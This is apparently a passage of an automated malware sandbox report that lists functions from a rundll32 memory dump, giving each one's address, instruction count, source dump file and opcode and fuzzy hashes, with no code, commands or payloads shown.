                                                                                                                                                                                                                                          • Instruction ID: 389c2d94414db7b26b8f897eddf65bddb5d0eaafb95fd7cfef06c6a02d4ab5c5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea2df35850f967c243500f0816ed1b3cca9864dca6f6acf8093b936f0db819c0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5FF0243120D3554FD72A5B79885406C7F62AF8622832882DEC4488B297CB329C13C795
                                                                                                                                                                                                                                          Function 04C3C4C9 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f2f63bfb5bd24668ce4bea1ecfdd2128a2c83c8c7cebdfe037e8b84f06556518
                                                                                                                                                                                                                                          • Instruction ID: 53585bf9274882fe9ddcc4ea58b6e658552c3e768f38801b0e27de8e87d23fff
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2f63bfb5bd24668ce4bea1ecfdd2128a2c83c8c7cebdfe037e8b84f06556518
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3F02E333043505BC3334725D8406EE7BA68FC2651B05465BD4459B455DD60FD0993D1
                                                                                                                                                                                                                                          Function 04C31431 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5c1c90b89572824fbd7346a3b0b994304dc40cbfc7875fb494fe682be4f052b0
                                                                                                                                                                                                                                          • Instruction ID: baffdfe1fc7246cccf2a9f37f2cf27bcf6a4d066eaee1eaa5e301732eeccf620
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c1c90b89572824fbd7346a3b0b994304dc40cbfc7875fb494fe682be4f052b0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38F0B474E043015FEB189F78A5656157FD7EEC121235B082EC90ADF151FD28E90A87E1
                                                                                                                                                                                                                                          Function 04C345B8 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 30c9efae33b8748c5f7fae3130aba9a164f93a16cb2c40e2155ed78831beca67
                                                                                                                                                                                                                                          • Instruction ID: c97f0475bbbb964b63d3bedc072b3950f32baf35c0aa770e992d534a6f9cc48f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30c9efae33b8748c5f7fae3130aba9a164f93a16cb2c40e2155ed78831beca67
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1F0BE343042018FD720DB6CE85096E3BE69FC92053080AAAE049CF621DB60FC068B51
                                                                                                                                                                                                                                          Function 04C3C688 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7899286022bb7a7aabdcffbbbf407b9b124242eb0d661ad7a23c3315230eacb5
                                                                                                                                                                                                                                          • Instruction ID: bf11c8f71a2f1c5ce63c62911b1678768d03e88ffdbcc195f75015ed2991b051
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7899286022bb7a7aabdcffbbbf407b9b124242eb0d661ad7a23c3315230eacb5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7F0A0367003114BD714EA75980056AB7ABAF896A1308C1B5E908C7310EE71D8438780
                                                                                                                                                                                                                                          Function 04C3AB90 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7aff5ea9d7b18a6e5eba9d5ca6952c916303c45406d189aa9102caae62dd59a2
                                                                                                                                                                                                                                          • Instruction ID: 7df3e07be0be121661c5e5944a944ccdbba3ea5631ace2f4bc5b90a56cb180e5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7aff5ea9d7b18a6e5eba9d5ca6952c916303c45406d189aa9102caae62dd59a2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2F0E5313083149FC3144B6EE88586A7BFAEBCA36131642F9F449CB262EA29DC168750
                                                                                                                                                                                                                                          Function 04C338B0 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e9c04b725a8d656964ffcdd9a4129c3f2b299aca6bce1e7cadf2b76a8a0b18e5
                                                                                                                                                                                                                                          • Instruction ID: 4974615b1da3dd27c10edec17b826431559c1d686649467ca1e03e99f4821e51
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e9c04b725a8d656964ffcdd9a4129c3f2b299aca6bce1e7cadf2b76a8a0b18e5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68F0A7217042E84AEB20166855403DA2F9B5F4631DF16007ACC81CBAB3D698ED45A3D1
                                                                                                                                                                                                                                          Function 04C34560 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 656779958da2c7ef1753dfef0578d2e9a69709c60e6ab3fdc3cba7bb172d4158
                                                                                                                                                                                                                                          • Instruction ID: 7def42f2ce210b1ea5ddb453d495b350104a5cfbe6d4913bd103ece9eb654fc9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 656779958da2c7ef1753dfef0578d2e9a69709c60e6ab3fdc3cba7bb172d4158
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61E02B767007041B8225E6ADE41085EBAC7EFC5161300463DD10DCF700DE24BC0643D9
                                                                                                                                                                                                                                          Function 04C336A9 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: acb0012a1c657d91367d42e3d6d4ecbdbae982db964e4a4c9592a985c0ee2ab3
                                                                                                                                                                                                                                          • Instruction ID: 747a6ce8acf45569ec8fba77f4341aae19df44365759d28bb3aa5db31c2dae8a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: acb0012a1c657d91367d42e3d6d4ecbdbae982db964e4a4c9592a985c0ee2ab3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89F03071E04229DF8B50EFA9D5411EFBBF5AF88201B20486EC80AD7221F3319A15CBC0
                                                                                                                                                                                                                                          Function 04C3576F Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d38d2b694026c44f3877d9ba44397b54bb73a643ba75be06da0ba92bb2574693
                                                                                                                                                                                                                                          • Instruction ID: ed8691a7680e11ef8839318f5354837f6ed14008012e274b8481c2e3aea68d7c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d38d2b694026c44f3877d9ba44397b54bb73a643ba75be06da0ba92bb2574693
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10E0DFBB601B209FF321FA58F8805C1B7D2EFC0239700C666D4898F911E764BC8B8B94
                                                                                                                                                                                                                                          Function 04C3C678 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5426c4708c416f86aac03d78f4131372421429c17544e6235367d9e68265abc8
                                                                                                                                                                                                                                          • Instruction ID: 9ee9d2c55e27d8738c1613875bb37b561cfa89ea4c97ae96c29261932698f29f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5426c4708c416f86aac03d78f4131372421429c17544e6235367d9e68265abc8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4E026336003125BD3115B71C8147B6FBBAEF86390B0885A6DE0087242EF32DC43C390
                                                                                                                                                                                                                                          Function 04C36AAF Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 36170dc262af195e35887c5745a6ecadb7ec30e95e29dd379d0d3022b977fd47
                                                                                                                                                                                                                                          • Instruction ID: 4cf167b15efde608a262c653a9b3d28a6d3d7cd07789fbedf9249e75303097c9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36170dc262af195e35887c5745a6ecadb7ec30e95e29dd379d0d3022b977fd47
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72F039713082549FD311CFA8D880C96BBE9EF5921131980AAE888CF363E721FD16CB60
                                                                                                                                                                                                                                          Function 04C3C1D0 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6dff01531f0bbca9519f73aefbe956ebc136bed0ba92753c52425cf4aac30e96
                                                                                                                                                                                                                                          • Instruction ID: 78d15f9807c8efb88aeb6b07c226deb47547a40c88279217827649110011ed92
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6dff01531f0bbca9519f73aefbe956ebc136bed0ba92753c52425cf4aac30e96
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75E022342063085FC310AB68D01546E3BE9EBC6368B02065AE885C7742DF387C058BD2
                                                                                                                                                                                                                                          Function 04C33CC0 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ce40ff1bc1dc0c070b34067b064de885ecfb24af585c9f5496957354bdbc44a8
                                                                                                                                                                                                                                          • Instruction ID: b811a1e5dfb49b412924e8448458e0ca68df9d78fab13a4b75402b068ec3359f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce40ff1bc1dc0c070b34067b064de885ecfb24af585c9f5496957354bdbc44a8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8BE026393081A00F8745079C74218BE3BEBCFC6A6231A03AFD309C7692CE155C064792
                                                                                                                                                                                                                                          Function 04C336B8 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0cfa8bbc40a4569aa7e3c07af7d9aef3d38a138ce3fc30ebf22d8fba1c64544d
                                                                                                                                                                                                                                          • Instruction ID: fcb995b1ab03bfbda6dd7db514d5e83c07fa163fd8486f245d045dde790f5d82
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0cfa8bbc40a4569aa7e3c07af7d9aef3d38a138ce3fc30ebf22d8fba1c64544d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3DE01270F0025ADF8B40DFA999011EEBBF5AF48141B108569C919E7250F331AA01CBD0
                                                                                                                                                                                                                                          Function 04C33CFF Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a98eff87f6fd305fb0a4bf6678d9ba1740c2aca83e79f4d1a7f8578cd382cbc2
                                                                                                                                                                                                                                          • Instruction ID: be926003c704d7d28a71b72aa752bd0ef4f0892537065996800bba273330731e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a98eff87f6fd305fb0a4bf6678d9ba1740c2aca83e79f4d1a7f8578cd382cbc2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4E09274A0935AEFCB01DFB4E85549D7FF5EF41300B2141EED444D7262EA311E158752
                                                                                                                                                                                                                                          Function 04C3CAC0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 32e82efbda51e2c306954e239955eb4e06dbc876bb22a16320fa8fa7be7ee14a
                                                                                                                                                                                                                                          • Instruction ID: 7499ee53b65a388a8c081df336c3702c31fe802a6cfc29c9246a181f1a1f68f1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32e82efbda51e2c306954e239955eb4e06dbc876bb22a16320fa8fa7be7ee14a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CAE0122150A3E04FDB229B3CC5B85D87FB19E8321571940DAC081CF063DA28584FC34A
                                                                                                                                                                                                                                          Function 04C36898 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d2a2286d6681875d43aef52f7317a3c367b00e1d99496ac47f207080da8ee152
                                                                                                                                                                                                                                          • Instruction ID: 74bb75f8480e5954a191ad13ac9622cf1c247bf8c0cf1ee3253ddeb501299655
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2a2286d6681875d43aef52f7317a3c367b00e1d99496ac47f207080da8ee152
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8E09A322152629FC3618B6CE845992FFB6EF9B31136586AAE048CB116D7749C42C790
                                                                                                                                                                                                                                          Function 04C3C1E0 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a257dee3d3dbf3f2123e1ee86f4e537100f1e0837ed0cc0099a3959090ad2500
                                                                                                                                                                                                                                          • Instruction ID: 0d4563ce2788b5b4ddc4cb2af91ad3175dd7ac947386d5cd7a26117a6ec7953f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a257dee3d3dbf3f2123e1ee86f4e537100f1e0837ed0cc0099a3959090ad2500
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8E02B353007085BC314B758E01595E7BDAFBC5775F40062DE54A87B40CE797D068BD6
                                                                                                                                                                                                                                          Function 04C33CD0 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c66f5309a160e5fae4b240531aff99187e3ff2d0c3d7f1c2a72db53374a2c27b
                                                                                                                                                                                                                                          • Instruction ID: 017921f0d16b02d038b7ebf36e20100e73790744300fbd9ed39d1840cbf534ad
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c66f5309a160e5fae4b240531aff99187e3ff2d0c3d7f1c2a72db53374a2c27b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FD0A73E300168174648279EB41586EB7EFCBC5D72305032FEB09C3340CE595C0103D5
                                                                                                                                                                                                                                          Function 04C36AC0 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f25f0fae09d1c1849478200382dca82acc86d3f867e68056b84fcd246817f904
                                                                                                                                                                                                                                          • Instruction ID: bd6e5398308d6fdad3e8850e9d4e5e13fd91129e4e63ecf6c5eef6afe6fdc086
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f25f0fae09d1c1849478200382dca82acc86d3f867e68056b84fcd246817f904
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AAE0EC75304204DFD314DF5CD884C95BBEAEF592553558199E848CF322D722FD12CB90
                                                                                                                                                                                                                                          Function 04C346D8 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8e8fb22258e9bde119f738524ba987f0a42106c2c3d14d0112d4516384b4ce96
                                                                                                                                                                                                                                          • Instruction ID: ffe284f2f22efcaa7285b501fa8a55d25d442d44f6caa2b451b769ed945de936
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e8fb22258e9bde119f738524ba987f0a42106c2c3d14d0112d4516384b4ce96
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75E0B674E0430CAFCB54EFF8E44559DBBF5AB48301F0081AAE809E7350EA386A058F81
                                                                                                                                                                                                                                          Function 04C30C0C Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c1e95258c9b11bf7539b00a4ab4eed87734eba5498cf9e58ff26ce2018688456
                                                                                                                                                                                                                                          • Instruction ID: ac3c3db3676b176afe8468d10c1d840e34e5840ab53c965d9ffa00d3115049d7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1e95258c9b11bf7539b00a4ab4eed87734eba5498cf9e58ff26ce2018688456
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14D0A73331011C6F52186656DC46A6A7FAEE7942623548423F90583310DD607C0593DA
                                                                                                                                                                                                                                          Function 04C329A3 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 097b3562471758e9951ed23513a64cba4d18920095e3c8236e01f50244006e5c
                                                                                                                                                                                                                                          • Instruction ID: d6c4b056f1ba1e4c88bd77e58a46aad728edea52d63f4d9291c5230a0563921d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 097b3562471758e9951ed23513a64cba4d18920095e3c8236e01f50244006e5c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5ED017352102005BE324E660E992B8A3B52EBC4201F558566E2095FAA5DE62BC4B8BD5
                                                                                                                                                                                                                                          Function 04C32960 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 853add3d29e72abc0eb5f94532ba89047d79ad9ff00b2cebf4ef6f2cb818a4f1
                                                                                                                                                                                                                                          • Instruction ID: af647ce50c78820de38df74c6429f34980147c3185f0cd66fbe270ab0607c8cd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 853add3d29e72abc0eb5f94532ba89047d79ad9ff00b2cebf4ef6f2cb818a4f1
